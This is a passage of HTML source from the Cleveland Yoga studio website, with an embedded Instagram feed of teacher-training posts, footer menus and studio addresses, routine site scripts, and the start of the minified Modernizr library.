Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;}},&quot;user_has_liked&quot;:false,&quot;likes&quot;:{&quot;count&quot;:56},&quot;tags&quot;:[],&quot;filter&quot;:&quot;Normal&quot;,&quot;comments&quot;:{&quot;count&quot;:3},&quot;type&quot;:&quot;video&quot;,&quot;link&quot;:&quot;https://www.instagram.com/p/BwBD7gUjOdF/&quot;,&quot;location&quot;:{&quot;latitude&quot;:41.46696,&quot;longitude&quot;:-81.4968899,&quot;name&quot;:&quot;Cleveland Yoga&quot;,&quot;id&quot;:352832241813574},&quot;attribution&quot;:null,&quot;users_in_photo&quot;:[],&quot;videos&quot;:{&quot;standard_resolution&quot;:{&quot;width&quot;:640,&quot;height&quot;:640,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/d3b43786d9cd86b34ebd08b2f819c7d0/5CDF6A02/t50.2886-16/57021388_129677621443373_1202081579662128371_n.mp4?efg=eyJ2ZW5jb2RlX3RhZyI6InZ0c192b2RfdXJsZ2VuLjY0MC5mZWVkIn0&amp;_nc_ht=scontent.cdninstagram.com&amp;vtsbc=1&quot;,&quot;id&quot;:&quot;17848813057396507&quot;},&quot;low_resolution&quot;:{&quot;width&quot;:480,&quot;height&quot;:480,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/2f1ea4754f22fac9110b8b98bc646bf8/5CDF6C10/t50.2886-16/57083220_124042322096647_4829626611939598844_n.mp4?efg=eyJ2ZW5jb2RlX3RhZyI6InZ0c192b2RfdXJsZ2VuLjQ4MC5mZWVkIn0&amp;_nc_ht=scontent.cdninstagram.com&amp;vtsbc=1&quot;,&quot;id&quot;:&quot;17958652606259407&quot;},&quot;low_bandwidth&quot;:{&quot;width&quot;:480,&quot;height&quot;:480,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/2f1ea4754f22fac9110b8b98bc646bf8/5CDF6C10/t50.2886-16/57083220_124042322096647_4829626611939598844_n.mp4?efg=eyJ2ZW5jb2RlX3RhZyI6InZ0c192b2RfdXJsZ2VuLjQ4MC5mZWVkIn0&amp;_nc_ht=scontent.cdninstagram.com&amp;vtsbc=1&quot;,&quot;id&quot;:&quot;17958652606259407&quot;}}},{&quot;id&quot;:&quot;2016258267394796653_369873443&quot;,&quot;user&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;},&quot;images&quot;:{&quot;thumbnail&quot;:{&quot;width&quot;:150,&quot;height&quot;:150,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/4d6fbb1b5dc23c13a732e4bdc2904752/5D78A30B/t51.2885-15/e35/s150x150/54447239_306523616686228_2604340831523721692_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;low_resolution&quot;:{&quot;width&quot;:320,&quot;height&quot;:320,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/d61cecefdf86a7c829f950d90c64930b/5D6518FB/t51.2885-15/e35/s320x320/54447239_306523616686228_2604340831523721692_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;standard_resolution&quot;:{&quot;width&quot;:640,&quot;height&quot;:640,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/56227322fdd8d2a8c4425966dcbbff8a/5D7B77AC/t51.2885-15/sh0.08/e35/s640x640/54447239_306523616686228_2604340831523721692_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;}},&quot;created_time&quot;:&quot;1554576737&quot;,&quot;caption&quot;:{&quot;id&quot;:&quot;18023493922185121&quot;,&quot;text&quot;:&quot;Yoga has shaped @tamischneider27 \u2018s life and now she is sharing the tools for teaching in her upcoming 300 hour YTT! Don\u2019t wait, spots are limited and going quickly. This program begins next weekend with the Level Up Advanced Training! Not sure if you are all-in on the 300 hour training? Come to Level Up next weekend. It will count for continuing Ed credits or, it serves as the first of 8 weekends needed to achieve your 500 hour status. \n#Repost @tamischneider27\n\u30fb\u30fb\u30fb\nYoga Teacher. Teacher Trainer. Practitioner. Service provider. Community lover. Local business owner. Public speaker. Yoga coach to pro athletes. My goodness! Yoga has shaped my whole world. I am blessed. \ud83d\ude4f\ud83c\udffc\ud83d\udc95\ud83d\udcab\n-\n-\n#yoga #joblove #blessed #selflove #communitylove #yogateachertraining #yogateacher #meditation #breathe #growth #stability #yogaforathletes #baptisteyoga #yogaforeverybody #deepcommunity #clevelandyoga #imaclevelander #thisiscle #cleismyom \u2764\ufe0f&quot;,&quot;created_time&quot;:&quot;1554576737&quot;,&quot;from&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;}},&quot;user_has_liked&quot;:false,&quot;likes&quot;:{&quot;count&quot;:63},&quot;tags&quot;:[&quot;breathe&quot;,&quot;communitylove&quot;,&quot;yogateachertraining&quot;,&quot;yoga&quot;,&quot;growth&quot;,&quot;yogateacher&quot;,&quot;clevelandyoga&quot;,&quot;joblove&quot;,&quot;blessed&quot;,&quot;stability&quot;,&quot;thisiscle&quot;,&quot;selflove&quot;,&quot;deepcommunity&quot;,&quot;baptisteyoga&quot;,&quot;imaclevelander&quot;,&quot;yogaforathletes&quot;,&quot;repost&quot;,&quot;cleismyom&quot;,&quot;meditation&quot;,&quot;yogaforeverybody&quot;],&quot;filter&quot;:&quot;Normal&quot;,&quot;comments&quot;:{&quot;count&quot;:5},&quot;type&quot;:&quot;image&quot;,&quot;link&quot;:&quot;https://www.instagram.com/p/Bv7MDYrguxt/&quot;,&quot;location&quot;:{&quot;latitude&quot;:41.46696,&quot;longitude&quot;:-81.4968899,&quot;name&quot;:&quot;Cleveland Yoga&quot;,&quot;id&quot;:352832241813574},&quot;attribution&quot;:null,&quot;users_in_photo&quot;:[]},{&quot;id&quot;:&quot;2015757279416232399_369873443&quot;,&quot;user&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;},&quot;images&quot;:{&quot;thumbnail&quot;:{&quot;width&quot;:150,&quot;height&quot;:150,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/7ff9eb8870c7d6108ec88c4065d423ae/5D680741/t51.2885-15/e35/s150x150/56981967_428979554581696_6452093087217247048_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;low_resolution&quot;:{&quot;width&quot;:320,&quot;height&quot;:320,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/183043628a88facf4985708e6b9ed0fb/5D746BB1/t51.2885-15/e35/s320x320/56981967_428979554581696_6452093087217247048_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;standard_resolution&quot;:{&quot;width&quot;:640,&quot;height&quot;:640,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/90bf82660d75a5a496673184ac9a7560/5D6A60E6/t51.2885-15/sh0.08/e35/s640x640/56981967_428979554581696_6452093087217247048_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;}},&quot;created_time&quot;:&quot;1554517014&quot;,&quot;caption&quot;:{&quot;id&quot;:&quot;17989621255202187&quot;,&quot;text&quot;:&quot;#Repost @katadawson\n\u30fb\u30fb\u30fb\nLife works in funny ways. About 16 months ago, in 2017, I met @beckyverner and randomly asked her about teaching yoga and mentioned I was interested in getting certified. Without missing a beat, she told me to do it - that I wouldn\u2019t regret it. Needless to say, I decided to go for it. Well, like life tends to do, things got busy and didn\u2019t really see Becky much after that conversation, until we both started teaching at @clevelandyoga Westlake a few months ago. Tonight I had the pleasure of assisting Becky\u2019s 90-minute Journey Into Power class; I\u2019m so glad I listened to her back then, and even happier I get to work with her now. There is something really inspiring about watching people do what they so clearly love. Moral of the story: trust the universe and go after what you want, things tend to work out the way they are supposed to. \ud83e\uddd8\ud83c\udffc\u200d\u2640\ufe0f\n.\n.\n.\n#clevelandyoga #yogateacher #yogastudent #baptisteyoga #yogafriends #trusttheprocess #journeyintopower #yogaeverydamnday #yogagirls #baptistepoweryoga&quot;,&quot;created_time&quot;:&quot;1554517014&quot;,&quot;from&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;}},&quot;user_has_liked&quot;:false,&quot;likes&quot;:{&quot;count&quot;:98},&quot;tags&quot;:[&quot;yogaeverydamnday&quot;,&quot;baptisteyoga&quot;,&quot;yogafriends&quot;,&quot;yogastudent&quot;,&quot;baptistepoweryoga&quot;,&quot;journeyintopower&quot;,&quot;repost&quot;,&quot;yogagirls&quot;,&quot;yogateacher&quot;,&quot;trusttheprocess&quot;,&quot;clevelandyoga&quot;],&quot;filter&quot;:&quot;Normal&quot;,&quot;comments&quot;:{&quot;count&quot;:11},&quot;type&quot;:&quot;image&quot;,&quot;link&quot;:&quot;https://www.instagram.com/p/Bv5aJDRAynP/&quot;,&quot;location&quot;:{&quot;latitude&quot;:41.46638,&quot;longitude&quot;:-81.90082,&quot;name&quot;:&quot;Cleveland Yoga&quot;,&quot;id&quot;:156593238299284},&quot;attribution&quot;:null,&quot;users_in_photo&quot;:[{&quot;user&quot;:{&quot;username&quot;:&quot;beckyverner&quot;},&quot;position&quot;:{&quot;x&quot;:0.307555542,&quot;y&quot;:0.7831110840000001}},{&quot;user&quot;:{&quot;username&quot;:&quot;katadawson&quot;},&quot;position&quot;:{&quot;x&quot;:0.7804444173,&quot;y&quot;:0.8506666667}}]},{&quot;id&quot;:&quot;2013477451544386957_369873443&quot;,&quot;user&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;},&quot;images&quot;:{&quot;thumbnail&quot;:{&quot;width&quot;:150,&quot;height&quot;:150,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/5dd21d66e09f45f08f2c32db90b65682/5D669C8C/t51.2885-15/e15/s150x150/54512570_380767712771754_4061786138410005092_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;low_resolution&quot;:{&quot;width&quot;:320,&quot;height&quot;:320,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/fd03ff296902934cb825fd91bd4d36d6/5D584E7C/t51.2885-15/e15/s320x320/54512570_380767712771754_4061786138410005092_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;},&quot;standard_resolution&quot;:{&quot;width&quot;:640,&quot;height&quot;:640,&quot;url&quot;:&quot;https://scontent.cdninstagram.com/vp/1da6b82533bf602e9a08fe5e555b05c1/5D633613/t51.2885-15/e15/s640x640/54512570_380767712771754_4061786138410005092_n.jpg?_nc_ht=scontent.cdninstagram.com&quot;}},&quot;created_time&quot;:&quot;1554245238&quot;,&quot;caption&quot;:{&quot;id&quot;:&quot;18017737315152103&quot;,&quot;text&quot;:&quot;Register for our 300 hour YTT and enjoy these program perks: \ud83d\udcabA 30-class pass for Cleveland Yoga to use between the start and end dates of your program \ud83d\udcab10% discount of all boutique items (apparel, mats, CY gear, etc.) through the duration of the training \ud83d\udcabAll necessary reading material \ud83d\udcabInstruction from Tami in a small group setting. This program is limited in space and only a few spaces remain, will one be yours?\n\nLearn more and register at our Link in Bio!&quot;,&quot;created_time&quot;:&quot;1554245238&quot;,&quot;from&quot;:{&quot;id&quot;:&quot;369873443&quot;,&quot;full_name&quot;:&quot;Cleveland Yoga&quot;,&quot;profile_picture&quot;:&quot;https://scontent.cdninstagram.com/vp/e2a54979fb624757e1a361b37996c7e1/5D6ADEE6/t51.2885-19/s150x150/20986774_165308480705351_4021273554489180160_a.jpg?_nc_ht=scontent.cdninstagram.com&quot;,&quot;username&quot;:&quot;clevelandyoga&quot;}},&quot;user_has_liked&quot;:false,&quot;likes&quot;:{&quot;count&quot;:46},&quot;tags&quot;:[],&quot;filter&quot;:&quot;Normal&quot;,&quot;comments&quot;:{&quot;count&quot;:0},&quot;type&quot;:&quot;image&quot;,&quot;link&quot;:&quot;https://www.instagram.com/p/BvxTxMGj92N/&quot;,&quot;location&quot;:null,&quot;attribution&quot;:null,&quot;users_in_photo&quot;:[]}],&quot;resized_images&quot;:[],&quot;available&quot;:13}"><div class="sbi_loader"></div></div><div id="sbi_load" class="sbi_hidden"></div></div> <div class="container-fluid" id="pre-footer"> <div class="row"> <div class="col-lg-3 col-md-6"> <div class="clearfix"> <span class="stay-connected">Stay Connected</span> <ul class="social-icons icon-circle list-unstyled list-inline" id="social-cy"> <li> <a href="https://www.facebook.com/clevelandyoga" target="_blank"><i class="fab fa-facebook"></i></a></li> <li> <a href="https://www.youtube.com/user/ClevelandYoga" target="_blank"><i class="fab fa-youtube"></i></a></li> <li> <a href="https://www.instagram.com/clevelandyoga/" target="_blank"><i class="fab fa-instagram"></i></a></li> </ul> </div> </div> <div class="col-lg-3 col-md-6 col-lg-push-6 col-lg-pull-0"> <div class="download-app-container clearfix"> <span class="download-app">Download the CY APP</span> <div id="download-app-container"> <a href="https://play.google.com/store/apps/details?id=com.fitnessmobileapps.clevelandyoga" target="_blank"><i class="fab fa-google-play transition"></i></a> <a href="https://itunes.apple.com/us/app/cleveland-yoga/id1044418573?mt=8" target="_blank"><i class="fab fa-apple transition"></i></a> </div> </div> </div> <div class="col-lg-6 col-md-12 c col-lg-pull-3"> <!--<label>Subscribe to our mailing list</label>--> <div id="footer-subscribe-container"> <form method='get' accept-charset='UTF-8' name='oi_form' action='https://track.namastelight.com/oi/1/a935b215c028632dcea2e300bb72f652' id="search" target="_blank"> <input type='text' name='email' id="sign-up-input" class="subscribe-clean-input" placeholder="Enter your email address" /> <input type='submit' value='Sign Up' id="sign-up-button" class="subscribe-clean-button transition" /> <input type='hidden' name='goto' value='' /> <input type='hidden' name='iehack' value='&#9760;' /> </form> </div> </div> </div> </div> <div class="container-fluid footer-menu-container"> <div class="row"> <div class="col-lg-2 col-md-4 footer-connect clearfix"> <!--<div class="footer-menu"> <a href="#">Contact Us</a> </div>--> <a href="https://clients.mindbodyonline.com/classic/ws?studioid=-567&stype=42&giftCardID=284" class="footer-button" target="_blank">Buy a gift card</a> <a href="/blog" class="footer-button">Visit Our Blog</a> </div> <div class="col-lg-2 col-md-4"> <div class="footer-menu"> <div><div class="menu-footer-menu-1-container"><ul id="menu-footer-menu-1" class="menu"><li id="menu-item-9920" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9920"><a href="https://www.clevelandyoga.com/new-yoga-students/">New Students</a></li> <li id="menu-item-9921" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9921"><a href="https://www.clevelandyoga.com/new-yoga-students/suggested-yoga-classes/">Suggested Beginning Yoga Classes</a></li> <li id="menu-item-9922" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9922"><a href="https://www.clevelandyoga.com/new-yoga-students/beginners-yoga-workshops/">Beginners Workshops</a></li> <li id="menu-item-9923" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9923"><a href="https://www.clevelandyoga.com/new-yoga-students/yoga-tips-and-etiquette/">Yoga Tips and Etiquette</a></li> <li id="menu-item-9924" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9924"><a href="https://www.clevelandyoga.com/new-yoga-students/faqs/">FAQs About Yoga</a></li> </ul></div></div> </div> </div> <div class="col-lg-2 col-md-4"> <div class="footer-menu"> <div><div class="menu-footer-menu-2-container"><ul id="menu-footer-menu-2" class="menu"><li id="menu-item-9925" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9925"><a href="https://www.clevelandyoga.com/yoga-classes/">Classes</a></li> <li id="menu-item-9926" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9926"><a href="https://www.clevelandyoga.com/yoga-classes/pricing/">Pricing</a></li> <li id="menu-item-9927" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9927"><a href="https://www.clevelandyoga.com/yoga-classes/why-the-heat/">Why The Heat?</a></li> <li id="menu-item-9928" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9928"><a href="https://www.clevelandyoga.com/yoga-classes/private-cleveland-yoga-sessions/">Private Sessions</a></li> <li id="menu-item-9929" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9929"><a href="https://www.clevelandyoga.com/yoga-classes/class-schedule/">Class Schedule</a></li> </ul></div></div> </div> </div> <div class="col-lg-2 col-md-4 clear-l-md"> <div class="footer-menu"> <div><div class="menu-footer-menu-3-container"><ul id="menu-footer-menu-3" class="menu"><li id="menu-item-9930" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9930"><a href="https://www.clevelandyoga.com/yoga-programs/">Programs</a></li> <li id="menu-item-9931" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9931"><a href="https://www.clevelandyoga.com/?page_id=448">Upcoming Events</a></li> <li id="menu-item-9932" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9932"><a href="https://www.clevelandyoga.com/yoga-programs/workshops/">Workshops &#038; Events</a></li> <li id="menu-item-9933" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9933"><a href="https://www.clevelandyoga.com/yoga-programs/runcleyoga-cy-run-club/">#runCLEyoga: CY Run Club</a></li> </ul></div></div> </div> </div> <div class="col-lg-2 col-md-4"> <div class="footer-menu"> <div><div class="menu-footer-menu-4-container"><ul id="menu-footer-menu-4" class="menu"><li id="menu-item-9934" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9934"><a href="https://www.clevelandyoga.com/cleveland-yoga-teacher-training/">Teacher Training</a></li> <li id="menu-item-9935" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9935"><a href="https://www.clevelandyoga.com/cleveland-yoga-teacher-training/teacher-training-faculty/">Yoga Teacher Training Staff</a></li> <li id="menu-item-9936" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9936"><a href="https://www.clevelandyoga.com/cleveland-yoga-teacher-training/yoga-teacher-training-testimonials/">Testimonials</a></li> <li id="menu-item-9937" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9937"><a href="https://www.clevelandyoga.com/cleveland-yoga-teacher-training/yoga-teacher-training-faq/">FAQs</a></li> </ul></div></div> </div> </div> <div class="col-lg-2 col-md-4"> <div class="footer-menu"> <div><div class="menu-footer-menu-5-container"><ul id="menu-footer-menu-5" class="menu"><li id="menu-item-9938" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9938"><a href="https://www.clevelandyoga.com/about-cleveland-yoga/">About Us</a></li> <li id="menu-item-9939" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9939"><a href="https://www.clevelandyoga.com/about-cleveland-yoga/desk-staff-application/">Desk Staff Application</a></li> <li id="menu-item-9940" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9940"><a href="https://www.clevelandyoga.com/about-cleveland-yoga/cy-opportunities/">CY Assistant Program</a></li> <li id="menu-item-9941" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9941"><a href="https://www.clevelandyoga.com/about-cleveland-yoga/breathe-boutique/">Breathe Boutique</a></li> </ul></div></div> </div> </div> </div><!-- row --> </div><!-- container --> <div class="footer-address-container"> <div class="container-fluid"> <div class="row"> <div class="col-md-3 c"> <div> <h4>Cleveland Yoga - Little Italy</h4> <a class="footer-phone" href="tel:2167044550">216.704.4550</a> <br /> <!--<a href="javascript:void(0)" onclick="openNav()" class="change-location">(change location)</a> <br />--> 2026 Murray Hill Rd, Room 210 <br /> Cleveland, OH 44106<br /> <a href="http://clients.mindbodyonline.com/ws.asp?studioid=-567&stype=-7&sTG=1&sView=week&sLoc=2" target="_blank" class="footer-button-small">Class Schedule</a> </div> </div> <div class="col-md-3 c"> <div class="footer-address"> <h4>CLEVELAND YOGA - BEACHWOOD</h4> <a class="footer-phone" href="tel:216.704.4550">216.704.4550</a> <br /> <!--<a href="javascript:void(0)" onclick="openNav()" class="change-location">(change location)</a> <br />--> 3355 Richmond Road, Ste 251A <br /> Beachwood, OH, 44122<br /> <a href="http://clients.mindbodyonline.com/ws.asp?studioid=-567&stype=-7&sTG=1&sView=week&sLoc=1" class="footer-button-small">Class Schedule</a> </div> </div> <div class="col-md-3 c"> <div> <h4>Cleveland Yoga - Westlake</h4> <a class="footer-phone" href="tel:2167044550">216.704.4550</a> <br /> <!--<a href="javascript:void(0)" onclick="openNav()" class="change-location">(change location)</a> <br />--> 1491 Columbia Rd. <br /> Westlake, Ohio, 44145<br /> <a href="http://clients.mindbodyonline.com/ws.asp?studioid=-567&stype=-7&sTG=1&sView=week&sLoc=3" target="_blank" class="footer-button-small">Class Schedule</a> </div> </div> <div class="col-md-3 c"> <div> <h4>Cleveland Yoga - Concord</h4> <a class="footer-phone" href="tel:2167044550 ">216.704.4550 </a> <br /> 7645 Crile Road <br /> Concord Township, Ohio 44077<br /> <a href="https://clients.mindbodyonline.com/classic/ws?studioid=476956&stype=-7&sView=day&sLoc=0" target="_blank" class="footer-button-small">Class Schedule</a> </div> </div> </div><!-- row --> <!-- <div class="row pt40"> <div class="col-md-6 c"> <div style="border-right: 1px solid #b2b2b2;"> <h4>Cleveland Yoga - Park East (Barre)</h4> <a class="footer-phone" href="tel:2163424229">216.342.4229</a> <br /> 3737 Park E Dr #209 <br /> Beachwood, OH 44122 <br /> <a href="https://clients.mindbodyonline.com/classic/ws?studioid=-567&stype=-7&sTG=34&sView=week&sLoc=4" target="_blank" class="footer-button-small">Class Schedule</a> </div> </div> <div class="col-md-6 c"> <div> <h4>Cleveland Yoga - Concord</h4> <a class="footer-phone" href="tel:2167044550 ">216.704.4550 </a> <br /> 7645 Crile Road <br /> Concord Township, Ohio 44077<br /> <a href="https://clients.mindbodyonline.com/classic/ws?studioid=476956&stype=-7&sView=day&sLoc=0" target="_blank" class="footer-button-small">Class Schedule</a> </div> </div> </div> --> </div> </div> </footer> <div id="sub-footer"> <div class="container"> <div class="row mb0"> <div class="col-md-12 c"> <img src="https://www.clevelandyoga.com/wp-content/themes/clevelandyoga2018/images/logo-footer.png" class="footer-logo"> © 2019 Cleveland Yoga. All rights reserved. <a href="/terms-of-use/">Terms of Use</a> | <a href="/privacy-policy/">Privacy Policy</a> <br /><br /> <a href="http://purelybranded.com" target="_blank">Cleveland Website Design</a> by Purely Branded </div><!-- 12 --> </div><!-- row --> <div><!-- container --> </div><!-- sub-footer --> <div id="myNav" class="overlay"> <a href="javascript:void(0)" class="closebtn" onclick="closeNav()">&times;</a> <div class="overlay-content"> <a href="">BEACHWOOD</a> <a href="">CONCORD</a> <a href="">LITTLE ITALY</a> <!--<a href="https://www.clevelandyoga.com">PARK EAST</a>--> <a href="">WESTLAKE</a> </div> </div> <!-- Instagram Feed JS --> <script type="text/javascript"> var sbiajaxurl = "https://www.clevelandyoga.com/wp-admin/admin-ajax.php"; </script> <script type="text/javascript"> function revslider_showDoubleJqueryError(sliderID) { var errorMessage = "Revolution Slider Error: You have some jquery.js library include that comes after the revolution files js include."; errorMessage += "<br> This includes make eliminates the revolution slider libraries, and make it not work."; errorMessage += "<br><br> To fix it you can:<br>&nbsp;&nbsp;&nbsp; 1. In the Slider Settings -> Troubleshooting set option: <strong><b>Put JS Includes To Body</b></strong> option to true."; errorMessage += "<br>&nbsp;&nbsp;&nbsp; 2. Find the double jquery.js include and remove it."; errorMessage = "<span style='font-size:16px;color:#BC0C06;'>" + errorMessage + "</span>"; jQuery(sliderID).show().html(errorMessage); } </script> <script type='text/javascript' src='https://www.clevelandyoga.com/wp-includes/js/wp-embed.min.js?ver=5.2'></script> <script type='text/javascript' src='https://www.clevelandyoga.com/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=6.0.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var sb_instagram_js_options = {"sb_instagram_at":".","sb_instagram_hide_photos":"","sb_instagram_block_users":"","highlight_ids":"","font_method":"svg","resized_url":"https:\/\/www.clevelandyoga.com\/wp-content\/uploads\/sb-instagram-feed-images\/","placeholder":"https:\/\/www.clevelandyoga.com\/wp-content\/plugins\/instagram-feed-pro\/img\/video-lightbox.png","br_adjust":"1"}; var sbiTranslations = {"Share":"Share","DATE_FORMAT":"en-US","Jan":"Jan","Feb":"Feb","Mar":"Mar","Apr":"Apr","May":"May","Jun":"Jun","Jul":"Jul","Aug":"Aug","Sep":"Sep","Oct":"Oct","Nov":"Nov","Dec":"Dec"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.clevelandyoga.com/wp-content/plugins/instagram-feed-pro/js/sb-instagram.js?ver=4.1.4'></script> <script src="https://www.clevelandyoga.com/wp-content/themes/clevelandyoga2018/js/menupure.js"></script> <script type="text/javascript"> /* Open */ function openNav() { document.getElementById("myNav").style.width = "100%"; } /* Close */ function closeNav() { document.getElementById("myNav").style.width = "0%"; } </script> <script type="text/javascript"> var $pbj = jQuery.noConflict(); $pbj(document).ready(function(){ $pbj("#menupure").menupure({ align: "right" }); var $menu = $pbj("#menu-container"); $window = $pbj(window); offset = $menu.offset(); var menuOffset = offset.top+2; $pbj(".owl-carousel").owlCarousel({ loop:true, margin:10, //slideBy: 2, autoplay:true, autoplayTimeout:5000, autoplayHoverPause:true, responsiveClass:true, responsive:{ 0:{ items:1, nav:false, navText: ['<span class="fas fa-chevron-left fa-2x"></span>','<span class="fas fa-chevron-right fa-2x"></span>'], }, 768:{ items:2, nav:true, navText: ['<span class="fas fa-chevron-left fa-2x"></span>','<span class="fas fa-chevron-right fa-2x"></span>'], }, 1000:{ items:3, nav:true, navText: ['<span class="fas fa-chevron-left fa-2x"></span>','<span class="fas fa-chevron-right fa-2x"></span>'], } } });; $pbj(document).bind('ready scroll',function() { var docScroll = $pbj(document).scrollTop(); if(docScroll >= menuOffset) { $pbj('body').addClass('fixed'); } else { $pbj('body').removeClass('fixed'); } }); }); </script> </body> </html>
0
/* Modernizr 2.6.2 (Custom Build) | MIT & BSD * Build: http://modernizr.com/download/#-inlinesvg-svg-svgclippaths-touch-shiv-mq-cssclasses-teststyles-prefixes-ie8compat-load */ window.Modernizr=function(e,t,n){function r(e){d.cssText=e}function i(e,t){return r(g.join(e+";")+(t||""))}function s(e,t){return typeof e===t}function o(e,t){return!!~(""+e).indexOf(t)}function u(e,t,r){for(var i in e){var o=t[e[i]];if(o!==n)return r===!1?e[i]:s(o,"function")?o.bind(r||t):o}return!1}var a="2.6.2",f={},l=!0,c=t.documentElement,h="modernizr",p=t.createElement(h),d=p.style,v,m={}.toString,g=" -webkit- -moz- -o- -ms- ".split(" "),y={svg:"http://www.w3.org/2000/svg"},b={},w={},E={},S=[],x=S.slice,T,N=function(e,n,r,i){var s,o,u,a,f=t.createElement("div"),l=t.body,p=l||t.createElement("body");if(parseInt(r,10))while(r--)u=t.createElement("div"),u.id=i?i[r]:h+(r+1),f.appendChild(u);return s=["&#173;",'<style id="s',h,'">',e,"</style>"].join(""),f.id=h,(l?f:p).innerHTML+=s,p.appendChild(f),l||(p.style.background="",p.style.overflow="hidden",a=c.style.overflow,c.style.overflow="hidden",c.appendChild(p)),o=n(f,e),l?f.parentNode.removeChild(f):(p.parentNode.removeChild(p),c.style.overflow=a),!!o},C=function(t){var n=e.matchMedia||e.msMatchMedia;if(n)return n(t).matches;var r;return N("@media "+t+" { #"+h+" { position: absolute; } }",function(t){r=(e.getComputedStyle?getComputedStyle(t,null):t.currentStyle)["position"]=="absolute"}),r},k={}.hasOwnProperty,L;!s(k,"undefined")&&!s(k.call,"undefined")?L=function(e,t){return k.call(e,t)}:L=function(e,t){return t in e&&s(e.constructor.prototype[t],"undefined")},Function.prototype.bind||(Function.prototype.bind=function(e){var t=this;if(typeof t!="function")throw new TypeError;var n=x.call(arguments,1),r=function(){if(this instanceof r){var i=function(){};i.prototype=t.prototype;var s=new i,o=t.apply(s,n.concat(x.call(arguments)));return Object(o)===o?o:s}return t.apply(e,n.concat(x.call(arguments)))};return r}),b.touch=function(){var n;return"ontouchstart"in e||e.DocumentTouch&&t instanceof DocumentTouch?n=!0:N(["@media (",g.join("touch-enabled),("),h,")","{#modernizr{top:9px;position:absolute}}"].join(""),function(e){n=e.offsetTop===9}),n},b.svg=function(){return!!t.createElementNS&&!!t.createElementNS(y.svg,"svg").createSVGRect},b.inlinesvg=function(){var 